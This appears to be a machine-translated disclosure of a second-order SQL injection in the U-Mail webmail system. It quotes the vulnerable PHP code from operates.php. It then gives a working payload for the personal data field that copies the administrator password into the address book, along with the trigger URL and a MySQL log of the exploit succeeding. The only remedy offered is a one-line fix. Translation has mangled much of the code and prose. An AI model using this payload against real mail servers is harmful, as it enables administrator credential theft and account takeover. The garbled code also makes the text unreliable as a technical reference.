U-Mail system second injection 3 (no problem, you can get the administrator password)
The second injection vulnerability in the U-Mail system allows you to directly obtain the administrator password.
Version: Latest Version v9.8.57
Vulnerability file/client/oab/module/operates. php code
If (ACTION = "save-to-pab") {include_once (LIB_PATH. "PAB. php "); $ PAB = PAB: getinstance (); $ maillist_id = gss ($ _ GET ['maillist']); if ($ maillist_id) {$ member_all = $ Maillist-> getMemberByMaillistID ($ maillist_id, "Mailbox, FullName", 0); if (! $ Member_all) {dump_json (array ("status" => TRUE, "message" => "");} foreach ($ member_all as $ member) {if (! $ PAB-> getContactByMail ($ user_id, $ member ['mailbox'], "contact_id", 0) {$ data = array ("user_id" => $ user_id, "fullname" => $ member ['fullname'], // second injection "pref_email" => $ member ['mailbox'], "updated" => date ("Y-m-d H: I: s"); $ res = $ PAB-> add_contact ($ data, 0); if (! $ Res) {dump_json (array ("status" => FALSE, "message" => el ("An error occurred while adding a contact. Adding failed! "," ") ;}}} Else {$ user_ids = gss ($ _ GET ['userlist']); $ user_ids = id_list_filter ($ user_ids ); // WooYun-2014-72963if (! $ User_ids) {dump_msg ("param_error", el ("parameter error! "," ") ;}$ Where =" t1.UserID IN (". $ user_ids. ")"; $ arr_tmp = $ Mailbox-> getMailboxInfo ($ domain_id, $ where, "", 0 ); $ user_all = $ arr_tmp ['data']; if (! $ User_all) {dump_json (array ("status" => TRUE, "message" => "");} foreach ($ user_all as $ user) {$ qq = $ msn = ""; if (strpos ($ user ['qqmsn '], "@") {$ msn = $ user ['qqmsn'];} else {$ qq = $ user ['qqmsn '];} if (! $ PAB-> getContactByMail ($ user_id, $ user ['email '], "contact_id", 0) {$ data = array ("user_id" => $ user_id, "fullname" => $ user ['fullname'], "pref_email" => $ user ['email '], "pref_tel" => $ user ['teleextension']? $ User ['teleextension']: $ user ['mobil '], "birthday" => $ user ['birthday'], "im_qq" => $ qq, "im_msn" => $ msn, "updated" => date ("Y-m-d H: I: s ")); $ res = $ PAB-> add_contact ($ data, 0); // second injection if (! $ Res) {dump_json (array ("status" => FALSE, "message" => el ("An error occurred while adding a contact. Adding failed! "," ") ;}}} Dump_json (array (" status "=> TRUE," message "=> ""));}
The vulnerability first introduces single quotes and databases. in personal data, enter the following exp,
', 'Homepage' = (SELECT password from userlist where userid = 2 )#
Http://mail.fuck.com/webmail/client/oab/index.php? Module = operate & action = member-get & page = 1 & orderby = & is_reverse = 1 & keyword = test2
Then execute the vulnerability function. The request is
View the personal address book and find the administrator password,
The SQL Execution Process is
150227 11:43:30 8724 Connectumail@localhost on 8724 QuerySET NAMES 'UTF8' 8724 Init DBumail 8724 QueryUPDATE userlist SET `FullName`='\',`homepage`=(SELECT password from userlist where userid=2)#',`EnglishName`='' WHERE UserID='13' 8724 QueryUPDATE mailuserinfo SET `sex`='0',`birthday`='0000-00-00',`mobil`='',`teleextension`='',`extnum`='',`qqmsn`='',`worknum`='',`memo`='',`o_group`='' WHERE UserID='13' 8724 Quit150227 11:46:10 8727 Connectumail@localhost on 8727 QuerySET NAMES 'UTF8' 8727 Init DBumail 8727 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*FROM userlist as t1, mailuserinfo as t2WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (13)ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 8727 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*FROM userlist as t1, mailuserinfo as t2WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (13)ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 8727 QuerySELECT contact_id FROM pab_contact WHERE user_id='13' AND pref_email='[email protected]' LIMIT 1 8727 QueryINSERT INTO pab_contact SET `user_id`='13',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)#',`pref_email`='[email protected]',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2015-02-27 11:46:10' 8727 Quit
Solution:
Escape before warehouse receiving